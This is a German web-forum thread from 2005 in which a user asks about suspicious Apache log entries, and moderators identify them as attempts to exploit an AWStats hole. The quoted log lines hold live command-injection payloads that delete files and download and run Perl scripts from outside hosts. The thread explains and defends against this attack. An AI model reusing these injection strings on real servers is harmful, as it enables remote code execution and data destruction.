bots?

Alles, was den Apache betrifft, kann hier besprochen werden.

bots?

Postby Vössli » 31. August 2005 13:28

Hallo

ich habe in den Logs ein paar Einträge gefunden, die ich nicht einordnen kann. Ständig werden meine Ordner /cgi-bin und /stats abgefragt:

203.114.64.241 - ... GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;rm -rf *;wget http://80.53.220.138/.it/icet;perl icet;echo ;rm -rf icet*;echo| HTTP/1.1" 404 297 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98

195.70.36.30 - - ... GET /awstats.pl/awstats.pl?configdir=|echo ;cd /tmp;rm-rf *;curl -O http://www.geocities.com/ircrider/a.pl;perl a.pl;echo ;rm -rf a.pl*;echo| HTTP/1.1 404 300 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98

auf der Seite http://80.53.220.138/.it/icet ist ein Script zu finden.
Kann mir jemand sagen was das für Adressen sind?
Vössli
 
Posts: 18
Joined: 26. July 2005 15:03

Postby Wiedmann » 31. August 2005 13:44

Da versucht nur jemand deine Festplatte zu löschen, durch Ausnützen einer Sicherheitslücke in AWStats.
Wiedmann
AF Moderator
 
Posts: 17106
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany

Postby deepsurfer » 31. August 2005 14:17

Das ist KEIN scherz von Wiedmann weder ironie noch irgendwie anders geartet.

Dein LOGeintrag sagt genau was versucht wird.
chirio Deep
Wie sagte einst der MCP aus Tron auf dem Bildschirm zu schreiben Pflegte
" ... end of communication ... "
User avatar
deepsurfer
AF Moderator
 
Posts: 6440
Joined: 23. November 2004 10:44
Location: Cologne
Operating System: Win-XP / Win7 / Linux -Debian

Postby Vössli » 31. August 2005 14:45

Ist diese Sicherheitslücke sehr gravierend? Ich habe zum Glück noch keinen Datenschwund bemerkt. ich könnte ja den Ordner AWstats einfach sperren.(?)


    Dieser log scheint mir auch nicht ganz koscher:
    222.187.114.2 - - GET http://bbs.qqchina.net/X_AdvCom_Get.asp?UserID=21520 HTTP/1.1 404 297 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98
    Vössli
     
    Posts: 18
    Joined: 26. July 2005 15:03

    Postby Wiedmann » 31. August 2005 14:49

    Ist diese Sicherheitslücke sehr gravierend?

    Kommt darauf an, ob du wichtige Daten auf der Festplatte hast und ein funktionierendes OS haben willst... ;-)

    ich könnte ja den Ordner AWstats einfach sperren.(?)

    könntest/solltest du.
    Wiedmann
    AF Moderator
     
    Posts: 17106
    Joined: 01. February 2004 12:38
    Location: Stuttgart / Germany


    Return to Apache

    Who is online

    Users browsing this forum: Peterzzz and 3 guests